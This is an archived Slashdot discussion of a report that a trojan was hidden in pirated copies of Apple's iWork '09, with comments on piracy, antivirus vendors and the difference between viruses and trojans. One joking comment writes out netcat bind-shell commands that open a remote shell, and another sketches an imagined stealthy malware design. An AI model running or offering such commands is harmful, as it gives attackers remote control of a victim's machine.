Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
Security OS X Operating Systems Software

Trojan Hides In Pirated Copies of Apple iWork '09 431

Posted by timothy
from the good-reason-not-to-pirate-software dept.
CWmike writes "Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites contain a Trojan horse that hijacks Macs and leaves them open to further attack, a security company said yesterday. The 'iServices.a' Trojan hitchhikes on iWork '09's installer, said Intego, which makes Mac security software. 'The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password,' Intego said in a warning. Once installed, the Trojan "phones home" to a malicious server to notify the hacker that the Mac has been compromised, and to await instructions."
This discussion has been archived. No new comments can be posted.

Trojan Hides In Pirated Copies of Apple iWork '09

Comments Filter:
  • by Majik Sheff (930627) on Thursday January 22, 2009 @10:42PM (#26570071) Journal

    The iPwn!

    • by guitarpy (1154687) on Friday January 23, 2009 @12:14AM (#26570797)
      I'd like to take this opportunity to welcome mac users to the pc world...I mean really....pirated software with a virus...who would have seen that one coming?
      • by darkpixel2k (623900) <aaron@heyaaron.com> on Friday January 23, 2009 @12:42AM (#26570955) Homepage

        I'd like to take this opportunity to welcome mac users to the pc world...I mean really....pirated software with a virus...who would have seen that one coming?

        I just wish someone would do this for the Linux world. I've tried nearly every ISO download under "Applications -> Unix" on The Pirate Bay, but everything seems to be *legal*.

        It won't be the year of Linux on the Desktop(tm) until you can download pirated linux applications from The Pirate Bay complete with virii and rootkits.

      • Pirates (Score:5, Insightful)

        by shmlco (594907) on Friday January 23, 2009 @01:40AM (#26571247) Homepage

        Not to troll, but as far as I'm concerned anyone who pirates software deserves it...

        • Re: (Score:3, Funny)

          by kalirion (728907)

          And does everyone who purchase a dime bag off the street deserve to have it laced with crack?

    • Re: (Score:3, Funny)

      by kalirion (728907)

      What's the world coming too? I mean if you can't even trust a warez provider...

  • by Anonymous Coward on Thursday January 22, 2009 @10:43PM (#26570079)
    Why not download the Trial version and unlock it with one of the million serials out there?
  • Of course (Score:5, Insightful)

    by ColdWetDog (752185) * on Thursday January 22, 2009 @10:43PM (#26570085) Homepage

    About Intego

    Intego develops and sells desktop Internet security and privacy software for Macintosh.

    • Re:Of course (Score:5, Interesting)

      by 0100010001010011 (652467) on Thursday January 22, 2009 @10:57PM (#26570225)

      LittleSnitch [obdev.at] is one of my favorite security programs. Shows any outgoing connections and I can allow for that session, once, or forever and to just that port, any port, that host, that host and port.

      Does anyone have a torrent to a file with the trojan? I'd like to open the .pkg and and look at it. It's surprisingly easy to look at the 'install' files. Right click on the pkg and open a few folders and look for pre-flight & post-flight scripts (which can be written in about any language). .pkgs are fun little things.

      • Re:Of course (Score:4, Insightful)

        by calmofthestorm (1344385) on Thursday January 22, 2009 @11:08PM (#26570311)

        It's especially nice if such monitoring software is not "on the radar" of malware sites, since they could include a workaround for such software, as is frequently done for Norton and Symantic on Windows.

      • Re: (Score:3, Informative)

        by biocute (936687)

        I can confirmed LittleSnitch works like a charm.

        The site above doesn't provide free download, so I went to an abundantware site called ThePirateBay.org.

        I'm surprised this little germ even comes with pre-whitelist feature and several connections that I've never heard of have already been pre-allowed.

        Truly a time-saver.

  • cynicism (Score:5, Insightful)

    by bwthomas (796211) <bwthomas.gmail@com> on Thursday January 22, 2009 @10:45PM (#26570107)

    Sometimes I wonder if companies that create security software aren't sometimes guilty of either creating or funding the creation of viruses, trojans, worms, &c. simply to justify their own existence.

    Is that cynical?

    • Re:cynicism (Score:5, Insightful)

      by zappepcs (820751) on Thursday January 22, 2009 @11:08PM (#26570307) Journal

      They certainly use virus news to justify their existence and the cost of their products. The fact that they exist is tantamount to admitting that no OS can be fully secured.

      The harder anti-virus vendors bleat on about how good their product is, the more bragging rights a virus writer will get for walking around the security... among their own crowd. It's more or less a case of putting up a wall and telling the world, there, you can't get past this wall now.

      The real trouble with anti-virus vendors is that they tend to convince people that once their product is installed, the end user's pc is safe. It is NOT, and won't ever be. Some of the best virus programs in the world are still out in the wild, running as they were intended to run, collecting and passing information as they are supposed to. Since they are not destructive to normal computer activity, they go undetected. Don't say that such does not exist... I know you have not done forensics on all existent computers. Every now and then we hear about some corporate espionage or attacks from state military groups etc. All of this is just hinting at the real problems: The virus programs we don't know about.

      Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.

      Soon, you'll need a multicore CPU just to handle real time scanning. It's a giant whack-a-mole game. Always will be.

      • Re: (Score:2, Informative)

        by LiENUS (207736)

        Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.

        Presumably you mean worm programs not virus programs. Virus programs are typically very obvious as they modify the executables on the system they infect. These modifications are easily detected as the checksums (md5, crc, whatever) change and someone notices.

        • Re:cynicism (Score:5, Interesting)

          by zappepcs (820751) on Friday January 23, 2009 @12:44AM (#26570967) Journal

          Actually, IMO we are in need of another category of malicious software. Social engineering allows code writers to get their code run by the user in a way that is neither stealthy or without their knowledge. It runs as a user program, and did not necessarily 'infect' the machine, yet is a virus by the definition that it has modified an executable. So we need either a new term, or be satisfied that the generic use of the term 'virus' fits such code.

          An example would be a screen saver that does it's work when the computer is idle and the screen saver itself has been run on the user's command to do so. That group of software that claims to be scanning software which does more than look for malicious code is also in this category. It's becoming quite confusing, and at any turn unvalidated code can be malicious. Many end users are unable to know the difference without much more training. Social engineering makes it fairly simple to get users to run malicious code.

          We've seen people repackage OOo software and sell it. It won't be long before we discover such tactics used to deliver malicious code. Would that be a virus or a worm?

          You see, my favorite scenario for malicious code is quite simple... spreads like a virus, then sits and waits patiently for the moment that it finds itself on a machine whose user is 'bill gates' (as an example) then every time the screen saver is activated, it searches the drive for the oldest .xls or .doc files and deletes two of them that are at least 45 days since last access. Every 17th time (or follow a Fibonacci number sequence) the screen saver is activated, it searches for Symantec installations and deletes the current virus definition file. Every 6th boot, it loads a key logger which looks for a select set of certain bank URLs. Every time you plug in a USB drive, it copies itself to the USB device if the screen saver is activated. You see, there are many ways to create hard to find problems. It won't be long before we are seeing them.

    • As long as there are crackers without girlfriends in the world, they don't need to.

      But to fuel your paranoia, maybe *that*'s why they sometimes used to offer jobs to prominent crackers;)

    • No, I've thought that for a long time. But I showed them, I simply downloaded a cracked version of their antivirus software! Sure, my computer promptly stopped working, but I'm sure that would have happened anyway. Correlation is not causation.

    • by Klootzak (824076)

      Is that cynical?

      Actually, it's called Critical or Analytical thinking [wikipedia.org]...

      Cynicism is a negative perception of something that doesn't neccessairily involve evaluation of the topic in the larger context, something like:
      "There is no good left in the world, people will never change, and I might as well become evil too!".
      ^^^^That's some pretty bad cynicism (or pessimism) though, hopefully most people don't ever get that cynical ;).

  • by pHatidic (163975) on Thursday January 22, 2009 @10:47PM (#26570119)

    If only Apple hadn't stripped out the DRM this would have never happened!

  • Haven't you seen the ads? Mac OS X doesn't get viruses. This story is a complete fabrication, bankrolled by Microsoft, created to instil fear in The Perfect Operating System. Please link real stories next time.
    • by falcon5768 (629591) <Falcon5768@@@comcast...net> on Thursday January 22, 2009 @10:58PM (#26570239) Journal
      Whos talking about a virus? I dont see ANYTHING about a virus. I DO see a story about a TROJAN. Whole different ball of wax there. No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admini password to install it.
      • by onecheapgeek (964280) on Thursday January 22, 2009 @11:03PM (#26570275) Journal
        And how long has it been since a true virus was attacking windows? It's always trojans, worms or adware and has been for several years.
        • by AKAImBatman (238306) * <akaimbatman AT gmail DOT com> on Thursday January 22, 2009 @11:12PM (#26570337) Homepage Journal

          And how long has it been since a true virus was attacking windows?

          Just this week. [nytimes.com]

          It's always trojans, worms or adware and has been for several years.

          A worm differs from a virus only in so much that it doesn't need to copy itself into a system program. For all intents and purposes however, the difference between the two terms is antiquated.

        • As a virus requires user interaction such as double clicking a email attachment and worms require no user interaction and auto install due to unpatched vulnerabilities in the OS, I would think worms are worse. The last time a major worm hit over 9 million Windows users was Jan 20th 2009. http://www.techtree.com/India/News/Windows_Virus_Infects_9_Million/551-98002-582.html [techtree.com] Back on topic, Macrumors reports that the trojan is already receiving instructions and participating in Denial of Service attacks. They a
        • by ceoyoyo (59147)

          Yes. Worms. Nobody ever hears about a trojan attacking Windows. It's simply not news.* Worms are the really evil ones, because they spread with no intervention, over the network, meaning they can infect a huge number of machines very quickly.

        • Re: (Score:2, Funny)

          by troll8901 (1397145)

          And how long has it been since a true virus was attacking windows?

          Every single day. Truly. They do that in building construction and renovation all the time.

          ("You move to an area and you multiply and multiply ... There is another organism on this planet that follows the same pattern. Do you know what it is? A virus.")

          It's always trojans, worms or adware and has been for several years.

          I don't think big wooden horses can fit through a window, although little crawling worms and poster advertisements can.

        • And how long has it been since a true virus was attacking windows? It's always trojans, worms or adware and has been for several years.

          Well, let's just say that we're reaching a point where it's easier to take advantage of users than it is to take advantage of code. Well, really, it has nothing to do with code, it's more just really really easy to make users look stupid. Example: Antivirus2009.exe

      • No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admini password to install it.

        I disagree. Systems can be and have been designed to make getting a trojan running and useful a very, very difficult feat of social engineering or even impossible without hacking the machine in advance. Right now these systems are fairly restricted in their deployment and none are mainstream on consumer PCs, but that doesn't mean mainstream OS's can't catch up and both OS X and Linux are working on technologies that can help mitigate trojans.

        • by Sir_Lewk (967686)
          Bullshit. A proper trojan differs from regular programs only in that it convinces the user it's meant for something else.
  • by Anonymous Coward on Thursday January 22, 2009 @10:48PM (#26570129)

    That it is the easiest trojan to use ever. Bravo, Apple.

  • by Dreadneck (982170)
    Since when does a PEBKAC error count as news? If you're idiot enough to install pirated software then you deserve what you get - and absolutely nobody can protect a computer system against user stupidity.
    • Since when does a PEBKAC error count as news?

      I take exception to your assertion. Just because a user runs a program does not mean that program should automatically be able to connect to a remote server without their permission or notification. That's the case for almost all current, mainstream OS's but that does not mean it is a good design.

      Second, this is news because it is a trojan reportedly in the wild for a platform where there are very few trojans circulating, especially trojans that are not targeting a specific person or company. People want to

      • Re: (Score:2, Insightful)

        by Dreadneck (982170)
        From the article:

        The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password

        As I said, it's a PEBKAC error. If you give an installer your admnin password it can do whatever it pleases. Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password. No security paradigm will ever be invented that cannot be undermined by human stupidity.

        • Re: (Score:3, Insightful)

          As I said, it's a PEBKAC error. If you give an installer your admnin password it can do whatever it pleases.

          And if you read my post, I'm telling you that is a design flaw in the OS. On a well designed OS, the software has more granularity of permission than "can do everything include connect to random servers" and "can't install". Apple seems to agree with me since they added an ACL framework to restrict applications with a finer level of permissions in the last version, although it is only used for a small subset of applications so far.

          Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password.

          I think installing pirated software is unethical and risky, but not necessari

      • by Trogre (513942)

        iPhone... consumer appliance.

        I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

        • iPhone... consumer appliance. I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.

          Software for the iPhone is centrally distributed by Apple and uses a signing framework to check packages (regular OS X has it to but it is largely unused). So how is someone going to post fake software with a trojan in it? If they manage to slip one past Apple's review, as soon as it is found Apple can revoke the signature for all copies deactivating them. Software on the iPhone runs in a sandbox and generally has limited permissions making it hard to root. All of these can be overcome, but it is really rea

    • I'm a lot more concerned about the legitimate and semi-legitimate companies that install spyware and malware with their software. At least when this kind of crap goes up on a torrent site, there are 7 posts within an hour or two warning other users that there's malware in the program. Whereas when a Microsoft or Sony sets you up the bomb they spend months denying there's a problem first. That still doesn't excuse the lazy user who installs whatever without checking it out first, but I don't think it's ac

  • by JoshuaZ (1134087) on Thursday January 22, 2009 @10:50PM (#26570157) Homepage
    If Apple were evil they could deliberately put hacked versions onto filesharing sites. More seriously, this is a good example of why even pirating software is really not a good idea. Unless you know exactly who you are downloading from you don't know what you are getting. Very little commercial software has nice little checksums or hashes that are easily available for you to verify. Downloading pirated software is a bit like having unprotected sex with a stranger. It might feel real good now, but you are going to regret it later.
  • But... (Score:2, Interesting)

    by alienunknown (1279178)
    From the article:

    Late last year, in fact, when Apple revised an online recommendation that Mac users consider running antivirus software, the move drew lots of attention.

    Most antivirus programs on os x actually scan for Windows viruses only, and are totally useless against almost all os x malware. The only software vendor that I know of that makes anti-malware programs for native OS X malware is Intego. Intego make great software and are mentioned in this article, but what about all the mac users out there who get a mac virus scanner that only scans for windows viruses? A lot of people are being duped.

  • "TrojanDevKit.DMG" - available only to 'special developers'. From the EULA: "Only to be used on occasions when our IP is getting ripped to the point we get irritated. Break glass in case of emergency."
  • Lol viruses? Get a Mac. Oh wait.
  • I always thought that torrents seem an ideal mechanism to spread viruses. If this becomes epidemic it could very well totally cripple the P2P community.

    With pirated software this risk can be mitigated if you have a verified trustworthy hash code of the untempered original version. On the other hand if there is an exploitable vulnerability in a popular codec movie torrents could become a massive security problem (obviously not for enterprise computing but the already more vulnerable home user).

  • by WiiVault (1039946) on Thursday January 22, 2009 @11:49PM (#26570615)
    I don't steal software, ever, but it is a well known fact (among Mac users) that iWork can be downloaded direct from Apple. All it takes is a valid serial number and you are ready to go. Why the heck would anybody bother firing up a torrent?
  • How is this news? (Score:2, Insightful)

    by mysidia (191772)

    Software programs downloaded from third-party pirate sites can contain trojans.

    Film at 11!

    It's not like trojans are unusual, they are commonplace, and a risk for every computer user who thinks about running things from untrusted sources.

  • Please execute the following as admin, type your password as requested:

    sudo nc -l -p1234 -d -e bash-L

    on windows:

    nc -l -p1234 -d -e cmd.exe -L

    Oh noes, I ownz yoo box now.

    (similar things can be done with reverse ssh tunneling but you get the point)

  • by night_flyer (453866) on Friday January 23, 2009 @10:49AM (#26575085) Homepage

    Im running windows...

"If truth is beauty, how come no one has their hair done in the library?" -- Lily Tomlin

Working...